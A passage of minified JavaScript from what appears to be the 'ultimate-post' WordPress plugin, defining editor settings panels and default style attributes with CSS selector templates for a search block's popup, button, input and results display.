Color","ultimate-post")}},{position:24,data:{type:"range",key:"resultMaxHeight",min:0,max:900,step:1,responsive:!0,label:__("Result Box Height","ultimate-post")}},{position:25,data:{type:"dimension",key:"resultPadding",unit:!0,responsive:!0,label:__("Item Padding","ultimate-post")}},{position:26,data:{type:"border",key:"resultBorder",label:__("Border","ultimate-post")}},{position:27,data:{type:"dimension",key:"resultBorderRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:28,data:{type:"boxshadow",key:"resultShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}},{position:29,data:{type:"range",key:"resultSpacingX",min:0,max:300,step:1,responsive:!0,label:__("Horizontal Position","ultimate-post")}},{position:30,data:{type:"range",key:"resultSpacingY",min:0,max:300,step:1,responsive:!0,label:__("Vertical Position","ultimate-post")}},{position:31,data:{type:"toggle",key:"resultSeparatorEnable",label:__("Enable Separator","ultimate-post")}},{position:32,data:{type:"color",key:"resultSeparatorColor",label:__("Separator Color","ultimate-post")}},{position:33,data:{type:"range",key:"resultSeparatorWidth",min:0,max:30,step:1,responsive:!0,label:__("Separator Width","ultimate-post")}},{position:34,data:{type:"toggle",key:"resMoreResultDevider",label:__("Disable Result Item Separator","ultimate-post")}}]}),r&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("More Result's","ultimate-post"),depend:"moreResultsbtn",include:[{position:1,data:{type:"range",key:"moreResultPosts",min:0,max:100,step:1,label:__("Show Initial Post","ultimate-post")}},{position:2,data:{type:"text",key:"moreResultsText",label:__("View More Results","ultimate-post")}},{position:3,data:{type:"typography",key:"moreResultsTypo",label:__("Typography","ultimate-post")}},{position:4,data:{type:"color",key:"moreResultsColor",label:__("Color","ultimate-post")}},{position:5,data:{type:"color",key:"moreResultsHoverColor",label:__("Hover Color","ultimate-post")}}]})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{store:t,initialOpen:!0,title:__("Adavnced Settings","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}},{position:3,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())}},85258:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},blockPubDate:{type:"string",default:"empty"},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},searchAjaxEnable:{type:"boolean",default:!0},searchFormStyle:{type:"string",default:"input1",style:[{depends:[{key:"searchBtnReverse",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-searchres-input { padding-left: 16px; }"},{depends:[{key:"searchBtnReverse",condition:"==",value:!0}]}]},searchnoresult:{type:"string",default:"No Results Found",style:[{depends:[{key:"searchAjaxEnable",condition:"==",value:!0}]}]},searchPopup:{type:"boolean",default:!1},searchPopupIconStyle:{type:"string",default:"popup-icon1",style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchPopupIconStyle",condition:"==",value:"popup-icon1"}]},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchPopupIconStyle",condition:"==",value:"popup-icon2"}]},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchPopupIconStyle",condition:"==",value:"popup-icon3"}],selector:"{{ULTP}} .ultp-searchpopup-icon { flex-direction: row-reverse }"}]},searchPostType:{type:"string",default:""},searchIconAlignment:{type:"string",default:"left",style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchIconAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-searchpopup-icon { margin: 0 auto; }"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchIconAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-searchpopup-icon,  \n                {{ULTP}} .ultp-search-animation-popup .ultp-search-canvas { margin-right: auto; }"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchIconAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-searchpopup-icon, \n                {{ULTP}} .ultp-search-animation-popup .ultp-search-canvas { margin-left: auto; }"}]},popupIconGap:{type:"object",default:{lg:"17",unit:"px"},style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon { gap:{{popupIconGap}}; }"}]},popupIconSize:{type:"object",default:{lg:"17",unit:"px"},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon svg { height:{{popupIconSize}}; width:{{popupIconSize}}; }"}]},popupIconTextTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon .ultp-search-button__text"}]},popupIconColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{selector:"{{ULTP}} .ultp-searchpopup-icon svg { color:{{popupIconColor}}; }"}]},popupIconTextColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon .ultp-search-button__text { color: {{popupIconTextColor}}; }"}]},popupIconBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon"}]},popupIconHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-searchpopup-icon:hover svg { color: {{popupIconHoverColor}}; }"}]},popupIconTextHoverColor:{type:"string",default:"",style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon:hover .ultp-search-button__text { color: {{popupIconTextHoverColor}}; }"}]},popupIconHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon:hover"}]},popupIconPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"8",right:"8",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon { padding: {{popupIconPadding}}; }"}]},popupIconBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000"},style:[{selector:"{{ULTP}}  .ultp-searchpopup-icon"}]},IconHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000"},style:[{selector:"{{ULTP}}  .ultp-searchpopup-icon:hover"}]},popupIconRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon { border-radius: {{popupIconRadius}}; }"}]},searchBtnEnable:{type:"boolean",default:!1},btnNewTab:{type:"boolean",default:!1},enableSearchPage:{type:"boolean",default:!0,style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}]},{depends:[{key:"searchBtnText",condition:"==",value:!0}]}]},searchBtnText:{type:"boolean",default:!0},searchBtnIcon:{type:"boolean",default:!0},searchIconAfterText:{type:"boolean",default:!1,style:[{depends:[{key:"searchIconAfterText",condition:"==",value:!1},{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchBtnText",condition:"==",value:!0}]},{depends:[{key:"searchIconAfterText",condition:"==",value:!0},{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { flex-direction: row-reverse }"}]},searchButtonText:{type:"text",default:"Search"},searchButtonPosition:{type:"object",default:{lg:"7",unit:"px"},style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input1"}],selector:"{{ULTP}} .ultp-searchform-content.ultp-searchform-input1 { gap:{{searchButtonPosition}}; }"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-button { right: {{searchButtonPosition}}; left: auto; }"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { left: {{searchButtonPosition}}; right: auto;}"},{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input1"}],selector:"{{ULTP}} .ultp-searchform-content.ultp-searchform-input1 { gap:{{searchButtonPosition}}; }"},{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-button { right: {{searchButtonPosition}}; left: auto; }"},{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { left: {{searchButtonPosition}}; right: auto;}"}]},searchTextGap:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { gap: {{searchTextGap}}; }"}]},searchBtnIconSize:{type:"object",default:{lg:"17",unit:"px"},style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button svg { height:{{searchBtnIconSize}}; width:{{searchBtnIconSize}}; }"}]},searchBtnTextTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button .ultp-search-button__text"}]},searchBtnIconColor:{type:"string",default:"#fff",style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button svg { color:{{searchBtnIconColor}}; }"}]},searchBtnTextColor:{type:"string",default:"#fff",style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button .ultp-search-button__text { color: {{searchBtnTextColor}}; }"}]},searchBtnBg:{type:"object",default:{openColor:1,type:"color",color:"#212121",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button"}]},btnBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-search-button"}]},searchBtnIconHoverColor:{type:"string",default:"",style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover svg { color:{{searchBtnIconHoverColor}}; }"}]},searchBtnTextHoverColor:{type:"string",default:"",style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover .ultp-search-button__text { color: {{searchBtnTextHoverColor}}; }"}]},searchBtnHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover"}]},btnHoverBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-search-button:hover"}]},searchBtnPadding:{type:"object",default:{lg:{top:"13",bottom:"13",left:"13",right:"13",unit:"px"}},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { padding: {{searchBtnPadding}}; }"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { padding: {{searchBtnPadding}}; }"}]},searchBtnRadius:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-button { border-radius: {{searchBtnRadius}}; }"}]},searchClear:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-search-clear { right: {{searchClear}} !important; }"}]},popupAnimation:{type:"string",default:"popup"},popupCloseIconSeparator:{type:"string",default:"Close Icon Style",style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}]}]},popupCloseSize:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-popupclose-icon svg { height:{{popupCloseSize}}; width:{{popupCloseSize}}; }"}]},popupCloseColor:{type:"string",default:"#000",style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-popupclose-icon svg { color:{{popupCloseColor}}; }"}]},popupCloseHoverColor:{type:"string",default:"#7777",style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-popupclose-icon:hover svg { color:{{popupCloseHoverColor}}; }"}]},windowpopupHeading:{type:"boolean",default:!0},windowpopupText:{type:"string",default:"Search The Query"},windowpopupHeadingAlignment:{type:"string",default:"center",style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading { text-align:{{windowpopupHeadingAlignment}}; }"}]},windowpopupHeadingTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:24,unit:"px"},decoration:"none",family:"",weight:600},style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading"}]},windowpopupHeadingColor:{type:"string",default:"#000",style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading { color:{{windowpopupHeadingColor}}; }"}]},popupHeadingSpacing:{type:"object",default:{lg:"12"},style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading { margin-bottom: {{popupHeadingSpacing}}px;}"}]},searchPopupPosition:{type:"string",default:"right",style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"}]}]},popupBG:{type:"object",default:{openColor:1,type:"color",color:"#FCFCFC"},style:[{selector:"{{ULTP}} .ultp-search-canvas"}]},canvasWidth:{type:"object",default:{lg:"600",xs:"100",ulg:"px",unit:"%"},style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"}],selector:"{{ULTP}} .ultp-search-canvas { width: {{canvasWidth}};}"},{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-search-canvas > div { max-width: {{canvasWidth}} !important; width: 100% !important; }"}]},popupPadding:{type:"object",default:{lg:{top:"40",bottom:"40",left:"40",right:"40",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-canvas { padding: {{popupPadding}}; }"}]},popupRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-canvas { border-radius: {{popupRadius}}; }"}]},popupShadow:{type:"object",default:{openShadow:1,width:{top:0,right:3,bottom:6,left:0},color:"rgba(0, 0, 0, 0.16)"},style:[{depends:[{key:"searchPopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-canvas"}]},popupPositionX:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"},{key:"searchPopupPosition",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-search-popup .ultp-search-canvas {right:{{popupPositionX}}; left: auto; } \n                body > {{ULTP}} { transform: translateX(-{{popupPositionX}}) }"},{depends:[{key:"popupAnimation",condition:"==",value:"popup"},{key:"searchPopupPosition",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-search-popup .ultp-search-canvas {  left:{{popupPositionX}}; right: auto; } \n                body > {{ULTP}}   { transform: translateX({{popupPositionX}}) }"}]},popupPositionY:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"}],selector:"{{ULTP}} .ultp-search-popup .ultp-search-canvas { top:{{popupPositionY}}; } \n                body > {{ULTP}}.result-data.ultp-search-animation-popup { translate: 0px {{popupPositionY}} }"}]},searchBtnReverse:{type:"boolean",default:!1,style:[{depends:[{key:"searchFormStyle",condition:"==",value:"input1"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-searchform-content.ultp-searchform-input1 { flex-direction: row-reverse; } \n                {{ULTP}} .ultp-searchres-input {  padding-left: 16px; padding-right: 40px; }"},{depends:[{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { right: auto; } \n                {{ULTP}} .ultp-search-clear { right: 16px;  } \n                {{ULTP}} .ultp-searchres-input {  padding-left: 120px;  padding-right: 40px;}"},{depends:[{key:"searchFormStyle",condition:"==",value:"input3"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button {  right: auto; left: 0px;} \n                {{ULTP}} .ultp-search-clear { right: 16px } \n                {{ULTP}} .ultp-searchres-input {  padding-left: 120px; padding-right: 40px;}"},{depends:[{key:"searchBtnReverse",condition:"==",value:!1}]}]},searchInputPlaceholder:{type:"string",default:"Search..."},inputTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input"}]},searchFormWidth:{type:"object",default:{lg:"",sm:"100",unit:"%"},style:[{depends:[{key:"searchPopup",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-searchform-content, \n                {{ULTP}} .ultp-search-result { width: {{searchFormWidth}} !important; }"}]},inputHeight:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}}  input.ultp-searchres-input { height: {{inputHeight}}; }"}]},inputColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input { color: {{inputColor}}; }"}]},inputBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .ultp-block-wrapper input.ultp-searchres-input"}]},inputFocusBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#000"},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input:focus"}]},inputBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#989898"},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input"}]},inputPadding:{type:"object",default:{lg:{}},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input { padding:{{inputPadding}}; }"}]},inputRadius:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} input.ultp-searchres-input { border-radius:{{inputRadius}}; }"}]},resColumn:{type:"object",default:{lg:"1"},style:[{selector:"{{ULTP}} .ultp-result-data { display: grid; grid-template-columns: repeat( {{resColumn}} , auto) } "}]},resultGap:{type:"object",default:{lg:"10"},style:[{depends:[{key:"resultSeparatorEnable",condition:"!=",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-result-data { gap:{{resultGap}}px; } "},{depends:[{key:"resMoreResultDevider",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-result-data { gap:{{resultGap}}px; } "},{depends:[{key:"moreResultsbtn",condition:"==",value:!1},{key:"resultSeparatorEnable",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-result-data { gap:{{resultGap}}px; } "}]},resExcerptEnable:{type:"boolean",default:!0},resCatEnable:{type:"boolean",default:!0},resAuthEnable:{type:"boolean",default:!0},resDateEnable:{type:"boolean",default:!0},resImageEnable:{type:"boolean",default:!0},resImageSize:{type:"object",default:{lg:"70",unit:"px"},style:[{depends:[{key:"resImageEnable",condition:"==",value:!0}],selector:"{{ULTP}}  img.ultp-searchresult-image { height:{{resImageSize}}; width:{{resImageSize}}; } "}]},resImageRadius:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{depends:[{key:"resImageEnable",condition:"==",value:!0}],selector:"{{ULTP}} img.ultp-searchresult-image { border-radius: {{resImageRadius}}; }"}]},resImageSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"resImageEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { column-gap:{{resImageSpace}}; } "}]},resTitleColor:{type:"string",default:"#101010",style:[{selector:"{{ULTP}} .ultp-search-result .ultp-searchresult-title { color:{{resTitleColor}}; }"}]},resExcerptColor:{type:"string",default:"#000",style:[{depends:[{key:"resExcerptEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-searchresult-excerpt { color:{{resExcerptColor}}; }"}]},resMetaColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}}  .ultp-searchresult-author, \n                {{ULTP}}  .ultp-searchresult-publishdate, \n                {{ULTP}} .ultp-searchresult-category a { color:{{resMetaColor}}; }"}]},resTitleHoverColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ultp-search-result .ultp-searchresult-title:hover { color:{{resTitleHoverColor}}; }"}]},resMetaHoverColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ultp-searchresult-author:hover, \n                {{ULTP}} .ultp-searchresult-publishdate:hover, \n                {{ULTP}} .ultp-searchresult-category a:hover { color:{{resMetaHoverColor}}; }"}]},resTitleTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:23,unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-search-result  a.ultp-searchresult-title"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:300},style:[{depends:[{key:"resExcerptEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-searchresult-excerpt"}]},resMetaTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:300},style:[{selector:"{{ULTP}} .ultp-search-result .ultp-searchresult-author, \n                {{ULTP}} .ultp-search-result .ultp-searchresult-publishdate, \n                {{ULTP}}  .ultp-searchresult-category a"}]},resExcerptLimit:{type:"string",default:"25",style:[{depends:[{key:"resExcerptEnable",condition:"==",value:!0}]}]},resultMetaSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rescontent-meta > div::after, \n                {{ULTP}} .ultp-rescontent-meta > .ultp-searchresult-author:after { margin: 0px {{resultMetaSpace}} }"}]},resultMetaSeparatorSize:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rescontent-meta > div::after, \n                {{ULTP}} .ultp-rescontent-meta > .ultp-searchresult-author:after { height:{{resultMetaSeparatorSize}}; width:{{resultMetaSeparatorSize}}; }"}]},resMetaSeparatorColor:{type:"string",default:"#4A4A4A",style:[{selector:"{{ULTP}} .ultp-rescontent-meta > div::after, \n                {{ULTP}} .ultp-rescontent-meta > .ultp-searchresult-author:after { background-color:{{resMetaSeparatorColor}}; }"}]},resultHighlighter:{type:"boolean",default:!0,style:[{depends:[{key:"resultHighlighter",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-highlight { font-weight: bold; text-decoration: underline } "},{depends:[{key:"resultHighlighter",condition:"==",value:!1}]}]},resultHighlighterColor:{type:"string",default:"#777777",style:[{depends:[{key:"resultHighlighter",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-highlight { color: {{resultHighlighterColor}}; }"}]},resultBg:{type:"object",default:{openColor:1,type:"color",color:"#FCFCFC"},style:[{selector:"{{ULTP}} .ultp-search-result"}]},resultMaxHeight:{type:"object",default:{lg:"300",unit:"px"},style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"fullwidth"}],selector:"{{ULTP}} .ultp-search-result {  max-height:{{resultMaxHeight}} !important; }  \n                {{ULTP}} .ultp-search-canvas:has(.ultp-search-clear.active) .ultp-search-result { min-height:{{resultMaxHeight}} !important; }"},{depends:[{key:"searchPopup",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result { max-height:{{resultMaxHeight}}; }  \n                {{ULTP}} .ultp-result-data { max-height:calc({{resultMaxHeight}} - 50px); }"},{depends:[{key:"searchPopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result { max-height:{{resultMaxHeight}}; } \n                {{ULTP}} .ultp-result-data { max-height:calc({{resultMaxHeight}} - 50px); }"}]},resultPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"15",right:"15",unit:"px"}},style:[{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-dropdown .ultp-result-data.ultp-result-show, \n                {{ULTP}}.popup-active .ultp-result-data.ultp-result-show { padding:{{resultPadding}}; } \n                {{ULTP}} .ultp-search-result .ultp-result-data:has( > div) { padding:{{resultPadding}}; }  \n                {{ULTP}} .ultp-search-noresult { padding: {{resultPadding}} !important;}"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result__item { padding:{{resultPadding}};} "},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result__item { padding:{{resultPadding}}; } "},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show, \n                {{ULTP}} .ultp-search-noresult { padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; }"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { padding:{{resultPadding}}; } "},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show,  \n                {{ULTP}} .ultp-search-noresult { padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; }"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show,  \n                {{ULTP}} .ultp-search-noresult {  padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; }"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show,  \n                {{ULTP}} .ultp-search-noresult { color: green; padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; color: red; }"}]},resultBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .ultp-search-result"}]},resultBorderRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-result { border-radius: {{resultBorderRadius}}; }"}]},resultShadow:{type:"object",default:{openShadow:0,width:{top:0,right:3,bottom:6,left:0},color:"rgba(0, 0, 0, 0.16)"},style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"popup"}],selector:"{{ULTP}} .ultp-search-canvas:has(.ultp-search-clear.active) .ultp-search-result"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-search-result:has(.ultp-result-data > div)"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"fullwidth"}],selector:"{{ULTP}} .ultp-search-canvas:has(.ultp-search-clear.active) .ultp-search-result"},{depends:[{key:"searchPopup",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result:has(.active), \n                {{ULTP}} .ultp-search-result:has( .ultp-result-data > .ultp-search-result__item )"}]},resultSpacingX:{type:"object",default:{lg:"0",unit:"px"},style:[{depends:[{key:"searchPopup",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-search-result { left:{{resultSpacingX}}; }"}]},resultSpacingY:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-search-result { top:{{resultSpacingY}}; 